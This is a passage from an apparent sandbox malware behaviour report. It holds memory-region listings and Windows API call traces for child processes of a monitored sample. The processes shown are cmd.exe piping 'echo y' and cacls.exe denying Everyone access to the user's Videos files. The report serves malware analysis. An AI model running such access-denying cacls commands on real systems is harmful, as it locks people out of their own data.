= 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 678 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 679 start_va = 0x650000 end_va = 0x653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 680 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 681 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 682 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 683 start_va = 0x7ee20000 end_va = 0x7ee42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee20000" filename = "" Region: id = 684 start_va = 0x7ee45000 end_va = 0x7ee45fff entry_point = 0x0 region_type = private name = "private_0x000000007ee45000" filename = "" Region: id = 685 start_va = 0x7ee48000 end_va = 0x7ee48fff entry_point = 0x0 region_type = private name = "private_0x000000007ee48000" filename = "" Region: id = 686 start_va = 0x7ee4d000 end_va = 0x7ee4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee4d000" filename = "" Region: id = 687 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 688 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 689 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 690 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 691 start_va = 0x670000 end_va = 0x671fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 701 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 702 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 703 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 704 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 17 os_tid = 0xb84 Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xc08b000" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 705 start_va = 0x910000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 706 start_va = 0x930000 end_va = 0x931fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 707 start_va = 0x940000 end_va = 0x94efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 708 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 709 start_va = 0x990000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 710 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 711 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 712 start_va = 0xab0000 end_va = 0xab1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 713 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 714 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 715 start_va = 0x7f090000 end_va = 0x7f0b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f090000" filename = "" Region: id = 716 start_va = 0x7f0ba000 end_va = 0x7f0bafff entry_point = 0x0 region_type = private name = "private_0x000000007f0ba000" filename = "" Region: id = 717 start_va = 0x7f0bc000 end_va = 0x7f0befff entry_point = 0x0 region_type = private name = "private_0x000000007f0bc000" filename = "" Region: id = 718 start_va = 0x7f0bf000 end_va = 0x7f0bffff entry_point = 0x0 region_type = private name = "private_0x000000007f0bf000" filename = "" Region: id = 719 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 720 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 721 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 722 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 723 start_va = 0xc20000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 724 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 725 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 726 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 745 start_va = 0x910000 end_va = 0x91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 746 start_va = 0xac0000 end_va = 0xb3dfff entry_point = 0xac0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 747 start_va = 0xbb0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 748 start_va = 0xd20000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 749 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 750 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 751 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 752 start_va = 0x7ef90000 end_va = 0x7f08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef90000" filename = "" Region: id = 753 start_va = 0x920000 end_va = 0x923fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Thread: id = 18 os_tid = 0xb8c [0036.012] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.012] __set_app_type (_Type=0x1) [0036.012] __p__fmode () returned 0x76ea1768 [0036.012] __p__commode () returned 0x76ea176c [0036.012] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.013] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.013] GetCurrentThreadId () returned 0xb8c [0036.013] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) returned 0x30 [0036.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.013] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.014] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa8fbe4 | out: phkResult=0xa8fbe4*=0x0) returned 0x2 [0036.015] VirtualQuery (in: lpAddress=0xa8fbf3, lpBuffer=0xa8fb8c, dwLength=0x1c | out: lpBuffer=0xa8fb8c*(BaseAddress=0xa8f000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.015] VirtualQuery (in: lpAddress=0x990000, lpBuffer=0xa8fb8c, dwLength=0x1c | out: lpBuffer=0xa8fb8c*(BaseAddress=0x990000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.015] VirtualQuery (in: lpAddress=0x991000, lpBuffer=0xa8fb8c, dwLength=0x1c | out: lpBuffer=0xa8fb8c*(BaseAddress=0x991000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.015] VirtualQuery (in: lpAddress=0x993000, lpBuffer=0xa8fb8c, dwLength=0x1c | out: lpBuffer=0xa8fb8c*(BaseAddress=0x993000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.015] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0xa8fb8c, dwLength=0x1c | out: lpBuffer=0xa8fb8c*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.015] GetConsoleOutputCP () returned 0x1b5 [0036.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.015] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.015] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.015] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.015] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.015] GetEnvironmentStringsW () returned 0xd24058* [0036.015] FreeEnvironmentStringsA (penv="=") returned 1 [0036.016] GetEnvironmentStringsW () returned 0xd24058* [0036.016] FreeEnvironmentStringsA (penv="=") returned 1 [0036.016] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa8eb34 | out: phkResult=0xa8eb34*=0x40) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x0, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x1, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x1, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x0, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x40, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x40, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x40, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegCloseKey (hKey=0x40) returned 0x0 [0036.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa8eb34 | out: phkResult=0xa8eb34*=0x40) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x40, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x1, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x1, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x0, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x9, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x4, lpData=0xa8eb40*=0x9, lpcbData=0xa8eb38*=0x4) returned 0x0 [0036.016] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa8eb3c, lpData=0xa8eb40, lpcbData=0xa8eb38*=0x1000 | out: lpType=0xa8eb3c*=0x0, lpData=0xa8eb40*=0x9, lpcbData=0xa8eb38*=0x1000) returned 0x2 [0036.016] RegCloseKey (hKey=0x40) returned 0x0 [0036.016] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.016] srand (_Seed=0x5aa5004f) [0036.016] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.016] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.016] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd24060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.017] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.017] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.017] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.017] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.017] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.017] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.017] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.017] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.017] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.017] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.017] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.017] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.017] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.017] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa8f914 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xa8f914, lpFilePart=0xa8f910 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f910*="Desktop") returned 0x1c [0036.017] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.017] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa8f690 | out: lpFindFileData=0xa8f690) returned 0xd24270 [0036.017] FindClose (in: hFindFile=0xd24270 | out: hFindFile=0xd24270) returned 1 [0036.017] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xa8f690 | out: lpFindFileData=0xa8f690) returned 0xd24270 [0036.017] FindClose (in: hFindFile=0xd24270 | out: hFindFile=0xd24270) returned 1 [0036.017] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.018] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xa8f690 | out: lpFindFileData=0xa8f690) returned 0xd24270 [0036.018] FindClose (in: hFindFile=0xd24270 | out: hFindFile=0xd24270) returned 1 [0036.018] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.018] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.018] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.018] GetEnvironmentStringsW () returned 0xd260b0* [0036.018] FreeEnvironmentStringsA (penv="=") returned 1 [0036.018] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.018] GetConsoleOutputCP () returned 0x1b5 [0036.018] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.018] GetUserDefaultLCID () returned 0x409 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa8fa40, cchData=128 | out: lpLCData="0") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa8fa40, cchData=128 | out: lpLCData="0") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa8fa40, cchData=128 | out: lpLCData="1") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.019] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.019] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.020] GetConsoleTitleW (in: lpConsoleTitle=0xd24d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.020] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.020] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.020] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.020] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.021] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.021] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.021] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.021] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.021] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.021] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.021] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.021] GetConsoleTitleW (in: lpConsoleTitle=0xa8f730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.022] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.022] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.022] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.022] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.022] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.022] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.022] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.022] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.022] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.022] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.022] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xa8f6ec | out: _Buffer="y\r\n") returned 3 [0036.022] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.022] GetFileType (hFile=0x28) returned 0x3 [0036.022] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.022] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.023] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0xa8f6dc, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xa8f6dc*=0x3, lpOverlapped=0x0) returned 1 [0036.023] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.023] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.023] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.023] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.023] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.023] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.023] SetConsoleInputExeNameW () returned 0x1 [0036.023] GetConsoleOutputCP () returned 0x1b5 [0036.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.023] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.023] exit (_Code=0) Process: id = "17" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x11a94000" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Videos\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 